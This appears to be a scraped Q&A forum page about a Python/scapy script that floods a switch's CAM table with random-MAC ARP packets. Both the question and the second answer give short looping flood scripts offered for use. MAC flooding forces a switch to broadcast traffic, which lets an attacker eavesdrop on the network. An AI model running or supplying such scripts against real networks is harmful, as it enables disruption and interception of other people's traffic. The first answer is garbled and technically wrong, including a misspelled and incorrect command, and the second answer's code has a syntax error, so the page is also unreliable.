Python / scapy mac flooding script
I'm trying to make a small mac flood tool in python to populate my switch cam tables, but I can't seem to do the magic? can you see what i am doing wrong?
from scapy.all import *
while 1:
dest_mac = RandMAC()
src_mac = RandMAC()
sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)
while the code seems to work fine, it just doesn't do the job. to test it I used wireshark to look at the packets, then run a THC parasite "that works" and the packets are pretty much the same, so I'm not sure what's going on. Thanks for any help.
source to share
You can only use any MAC address: the mac address is made up of six groups of two hexadecimal digits separated by hyphens (-) or colons (:). The first three fields must be filled with some values ββthat are different for each vendor. If these fields are not specified with any vendor code, the server (or client) will remove the package. You can find a list of mac vendors on the wireshark manuf file, or just search for it with google. You can check the address by typing "sudo ifcofig IFACE ether hw ADDRESS" in a terminal.
source to share
Emada,
MAC addresses are learned with switches using the source address, so there is no need to worry about assignment randomization.
I've tested this and it seems to work well. You might also want to try the sendpfast flood option, however, in my testing here, sendp seems to be faster?
from scapy.all import *
while 1:
sendp(Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18)))
source to share